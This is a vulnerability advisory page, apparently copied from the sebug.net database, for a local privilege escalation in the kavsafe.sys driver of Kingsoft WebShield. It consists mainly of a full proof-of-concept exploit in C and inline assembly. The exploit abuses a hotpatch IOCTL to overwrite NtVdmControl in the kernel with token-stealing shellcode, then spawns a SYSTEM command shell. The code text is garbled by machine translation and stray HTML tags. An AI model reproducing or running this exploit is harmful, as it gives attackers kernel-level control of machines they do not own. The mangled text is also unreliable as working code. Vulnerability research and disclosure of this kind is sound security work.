Kingsoft WebShield kavsafe. sys <=
2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation
Vulnerabilityssv ID: WebShield kavsafe. sys <= 2010.4.14.609 (2010.5.23) Kernel Mode local
Privilege Escalation Vulnerability "href =" http://sebug.net/vulndb/19676/ "target =" _ blank "> 19676sebug-appdir: Kingsoft Release Date: 2010-05-23 information submitted: yicong2010
(Yicong2010_at_yahoo.com)
Affected Versions:
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)
Signature Date: 2010-5-23 2:33:54
And
KAVSafe.sys <= 2010.4.14.609
Signature Date:2010-4-14 13:42:26
Vulnerability description:
Kavsafe.sys create a device called DeviceKAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
<* Reference
None
*> Test method:
[Www.sebug.net]
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!
# Define ctl_code (0x8300, 0x835, method_buffered, file_any_access) <br/> typedef long (winapi * pnt_query_information_process) (<br/> handle processhandle, <br/> DWORD processinformationclass, <br/> pvoid processinformation, <br/> ulong processinformationlength, <br/> Pulong returnlength <br/> ); <br/> typedef struct _ string {<br/> ushort length; <br/> ushort maximumleng Th; <br/> pchar buffer; <br/>}string; <br/> typedef string * pstring; <br/> typedef struct _ rtl_drive_letter_curdir {<br/> ushort flags; <br/> ushort length; <br/> ulong timestamp; <br/> string dospath; <br/>} rtl_drive_letter_curdir, * delimiter; <br/> typedef struct _ unicode_string {<br/> ushort length; <br/> ushort maximumlength; <br/> pwstr buffer; <br/>} unicode_string; <br/> type Def unicode_string * punicode_string; <br/> typedef const unicode_string * pcunicode_string; <br/> # define rtl_max_drive_letters 32 <br/> # define rtl_drive_letter_valid) 0x0001 <br/> typedef struct _ curdir {<br/> unicode_string dospath; <br/> handle; <br/>}curdir, * pcurdir; <br/> typedef struct _ rtl_user_process_parameters {<br/> ulong maximumlength; <br/> ulong length; </P> <p> ulong flag S; <br/> ulong debugflags; </P> <p> handle consolehandle; <br/> ulong consoleflags; <br/> handle standardinput; <br/> handle standardoutput; <br/> handle standarderror; </P> <p> curdir currentdirectory; // processparameters <br/> unicode_string dllpath; // processparameters <br/> unicode_string imagepathname; // processparameters <br/> unicode_string CommandLine; // processparameters <br/> pvoid envir Onment; // ntallocatevirtualmemory </P> <p> ulong startingx; <br/> ulong startingy; <br/> ulong countx; <br/> ulong county; <br/> ulong countcharsx; <br/> ulong countcharsy; <br/> ulong fillattriags; </P> <p> ulong windowflags; <br/> ulong showwindowflags; <br/> unicode_string windowtitle; // processparameters <br/> unicode_string returns topinfo; // processparameters <br/> unicode_string shellinfo; // P Rocessparameters <br/> unicode_string runtimedata; // processparameters <br/> using currentdirectores [rtl_max_drive_letters]; <br/>} rtl_user_process_parameters, * parameters; <br/> typedef struct _ peb {<br/> Boolean inheritedaddressspace; // these four fields cannot change unless the <br/> Boolean readimagefileexecoptions; // <br/> Boolean beingdebugged; // <br /> Boolean sparebool; // <br/> handle mutant; // initial_peb structure is also updated. </P> <p> pvoid imagebaseaddress; <br/> pvoid LDR; <br/> struct _ rtl_user_process_parameters * processparameters; <br/>} peb, * ppeb; <br/> typedef long kpriority; <br/> typedef struct _ process_basic_information {<br/> long exitstatus; <br/> pvoid pebbaseaddress; <br/> ulong_ptr affinitymask; <br/> kpriority basepri Ority; <br/> ulong_ptr uniqueprocessid; <br/> ulong_ptr identifier; <br/>} process_basic_information, * pprocess_basic_information; <br/> typedef struct {<br/> ulong unknown1; <br/> ulong unknown2; <br/> pvoid base; <br/> ulong size; <br/> ulong flags; <br/> ushort index; <br/> ushort namelength; <br/> ushort loadcount; <br/> ushort pathlength; <br/> char imagename [1, 256]; <br/>} sys Struct, * struct; <br/> typedef struct {<br/> ulong count; <br/> system_module_information_entry module [1]; <br/>} x_system_module_information, * px_system_module_information; <br/> typedef long (winapi * pnt_query_system_information) (<br/> long systeminformationclass, <br/> pvoid systeminformation, <br/> ulong systeminformationlength, <br/> Pulong RET Urnlength <br/>); <br/> # define ntcurrentprocess () (handle) (long_ptr)-1) <br/> typedef long (winapi * pnt_vdm_control) (<br/> ulong service, <br/> pvoid servicedata <br/>); <br/> void _ declspec (naked) r0shellcodexp () <br/>{< br/>__ ASM <br/>{< br/> mov eax, 0xffdff124 <br/> mov eax, [eax] <br/> mov ESI, dword ptr [eax + 0x220] <br/> mov eax, ESI <br/> searchxp: <br/> mov eax, dword ptr [eax + 0x88] <br/> sub EA X, 0x88 <br/> mov edX, dword ptr [eax + 0x84] <br/> CMP edX, 4 <br/> jnz searchxp <br/> mov eax, dword ptr [eax + 0xc8] <br/> mov dword ptr [ESI + 0xc8], eax <br/> RET 8 <br/>}< br/> void nopnop () <br/>{< br/> printf ("Nop! /N "); <br/>}< br/> # include" malloc. H "<br/> int main (INT argc, char * argv []) <br/>{< br/> printf (" kswebshield kavsafe. sys <= 2010,04, 14,609/N "<br/>" kernel mode Privilege Escalation Vulnerability proof-of-concept/N "<br/>" 2010-5-23/N "<br/>" by lincoin/n/npress enter "); <br/> hkey; <br/> wchar installpath [max_path]; <br/> DWORD datatype; <br/> DWORD datasize = max_path * sizeof (wchar ); <br/> ulong Oldlen; <br/> pvoid poldbufferdata = NULL; <br/> If (regopenkey (HKEY_LOCAL_MACHINE, "software // Kingsoft // kswsvc", & hkey) = error_success) <br/>{< br/> If (regqueryvalueexw (hkey, l "programpath", null, & datatype, (lpbyte) installpath, & datasize )! = Error_success) <br/>{< br/> regclosekey (hkey); <br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> regclosekey (hkey ); <br/>}< br/> else <br/> {<br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> wcscat (installpath, l "// kavinst.exe"); </P> <p> process_basic_information PBI; <br/> pnt_query_information_process pntqueryinformationpr Ocess; </P> <p> pntqueryinformationprocess = (pnt_query_information_process) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntqueryinformationprocess "); </P> <p> pntqueryinformationprocess (ntcurrentprocess (), 0, & PBI, sizeof (PBI), null ); <br/> ppeb peb; <br/> peb = (ppeb) PBI. pebbaseaddress; <br/> oldlen = peb-> processparameters-> imagepathname. length; <br/> peb-> processparameters-> imagepathname. length = Wcslen (installpath) * sizeof (wchar); <br/> poldbufferdata = malloc (peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (poldbufferdata, peb-> processparameters-> imagepathname. buffer, peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, installpath, peb-> processparameters-> imagepathname. length); <br/> handle hdev = createfile ("////. // Kavsafe ", <br/> file_read_attributes, <br/> file_share_read, <br/> 0, <br/> open_existing, <br/> 0, <br/> 0); <br/> If (hdev = invalid_handle_value) <br/>{< br/> printf ("cannot open device % u/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, poldbufferdata, peb-> processparameters-> imagepathname. length); <br/> peb-> Process Parameters-> imagepathname. length = (ushort) oldlen; </P> <p> pnt_query_system_information pntquerysysteminformation; <br/> pntquerysysteminformation = (pnt_query_system_information) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntquerysysteminformation "); <br/> x_system_module_information sysmod; <br/> hmodule kernelhandle; <br/> pntquerysysteminformation (0xb, & sysmod, sizeof (sysmod ), null); </P> <p> K Ernelhandle = loadlibrary (strrchr (sysmod. module [0]. imagename, '//') + 1); </P> <p> If (kernelhandle = 0) <br/>{< br/> printf ("cannot load ntoskrnl! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pvoid pntvdmcontrol = getprocaddress (kernelhandle, "ntvdmcontrol"); <br/> If (pntvdmcontrol = 0) <br/> {<br/> printf ("cannot find ntvdmcontrol! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pntvdmcontrol = (pvoid) (ulong) pntvdmcontrol-(ulong) kernelhandle); <br/> printf ("ntvdmcontrol = % 08x", pntvdmcontrol); </P> <p> getchar (); <br/> ulong shellcodesize = (ulong) nopnop-(ulong) r0shellcodexp; <br/> ulong pshellcode = (ulong) r0shellcodexp; </P> <p> pvoid DATA = malloc (0x48 + shellcodesize); <br/> copymemory (pvoid) (ulong) Data + 0x48), r0sh Ellcodexp, shellcodesize); </P> <p> char modulename [68] = "ntoskrnl.exe"; <br/> rtlcopymemory (data, modulename, sizeof (modulename )); <br/> * (ulong *) (ulong) Data + 64) = (ulong) pntvdmcontrol; <br/> * (ulong *) (ulong) Data + 68) = shellcodesize; </P> <p> ulong BTR; <br/> If (! Deviceiocontrol (hdev, <br/> ioctl_hotpatch_kernel_module, <br/> data, <br/> 0x48 + shellcodesize, <br/> null, <br/> 0, <br/> & BTR, 0 <br/>) <br/> {<br/> printf ("cannot device Io control! % U/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> closehandle (hdev ); <br/> pnt_vdm_control pr3ntvdmcontrol = (pnt_vdm_control) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntvdmcontrol "); <br/> pr3ntvdmcontrol (0, 0); </P> <p> winexec (" cmd.exe ", sw_show ); <br/> printf ("OK! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/>
Address: http://sebug.net/vulndb/19676/